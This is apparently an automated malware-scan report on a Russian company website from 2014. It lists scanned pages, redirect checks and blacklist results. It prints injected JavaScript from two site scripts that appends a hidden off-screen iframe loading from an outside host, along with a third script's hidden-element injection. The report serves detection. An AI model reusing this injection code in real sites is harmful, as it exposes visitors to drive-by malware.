Scanned pages/files
| Request | Server response | Status |
http://evromaster-yug.ru/ | 200 OK Content-Length: 20800 Content-Type: text/html | clean |
http://evromaster-yug.ru/media/system/js/caption.js | 200 OK Content-Length: 2122 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); ;document.write('<iframe style="position:fixed;left:-500px;top:0px;" height="1127" width="127" src="http://dcsvu.dns-stuff.com/a2.unLSihp?default"></iframe>'); Antivirus reports:
| ||
http://evromaster-yug.ru/templates/evromaster/script.js | 200 OK Content-Length: 8809 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var artEventHelper = { 'bind': function(obj, evt, fn) { if (obj.addEventListener) obj.addEventListener(evt, fn, false); else if (obj.attachEvent) obj.attachEvent('on' + evt, fn); else obj['on' + evt] = fn; } }; var userAgent = navigator.userAgent.toLowerCase(); var browser = { version: (userAgent.match(/.+(?:rv|it|ra|ie)[\/: ]([\d.]+)/) || [])[1], safari: /webkit/.test(userAgent) &am }); } } } artLoadEvent.add(function() { artButtonsSetupJsHover("art-button"); }); artLoadEvent.add(function() { artButtonsSetupJsHover("button"); artButtonsSetupJsHover("readon"); });;document.write('<iframe style="position:fixed;left:-500px;top:0px;" height="1127" width="127" src="http://dcsvu.dns-stuff.com/a2.unLSihp?default"></iframe>'); Antivirus reports:
| ||
http://evromaster-yug.ru/pages/lavise.js | 200 OK Content-Length: 109881 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\ document.write('<div id="basic-modal-content2" style="display:none"></div>'); document.write("<style>.pegehadn { display:none; }</style>"); Antivirus reports:
| ||
http://evromaster-yug.ru/production.html | 200 OK Content-Length: 17104 Content-Type: text/html | clean |
http://evromaster-yug.ru/production/kley.html | 200 OK Content-Length: 36699 Content-Type: text/html | clean |
http://evromaster-yug.ru/production/kley/em40.html | 200 OK Content-Length: 27451 Content-Type: text/html | clean |
http://evromaster-yug.ru/production/kley/em41.html | 200 OK Content-Length: 27344 Content-Type: text/html | clean |
http://evromaster-yug.ru/production/kley/em42.html | 200 OK Content-Length: 27605 Content-Type: text/html | clean |
http://evromaster-yug.ru/production/kley/em43.html | 200 OK Content-Length: 27707 Content-Type: text/html | clean |
http://evromaster-yug.ru/production/kley/em45.html | 200 OK Content-Length: 31564 Content-Type: text/html | clean |
http://evromaster-yug.ru/production/pol.html | 200 OK Content-Length: 31342 Content-Type: text/html | clean |
http://evromaster-yug.ru/production/pol/em10.html | 200 OK Content-Length: 27444 Content-Type: text/html | clean |
http://evromaster-yug.ru/production/pol/em15.html | 200 OK Content-Length: 29315 Content-Type: text/html | clean |
http://evromaster-yug.ru/production/pol/em18.html | 200 OK Content-Length: 27411 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: evromaster-yug.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 17 Apr 2014 18:46:53 GMT
Server: nginx/1.1.19
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.3.10-1ubuntu3.4
GET / HTTP/1.1
Host: evromaster-yug.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 17 Apr 2014 18:46:53 GMT
Server: nginx/1.1.19
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Second query (visit from search engine):
GET / HTTP/1.1
Host: evromaster-yug.ru
Referer: http://www.google.com/search?q=evromaster-yug.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: evromaster-yug.ru
Referer: http://www.google.com/search?q=evromaster-yug.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=evromaster-yug.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://evromaster-yug.ru/
Result: evromaster-yug.ru is not infected or malware details are not published yet.
Result: evromaster-yug.ru is not infected or malware details are not published yet.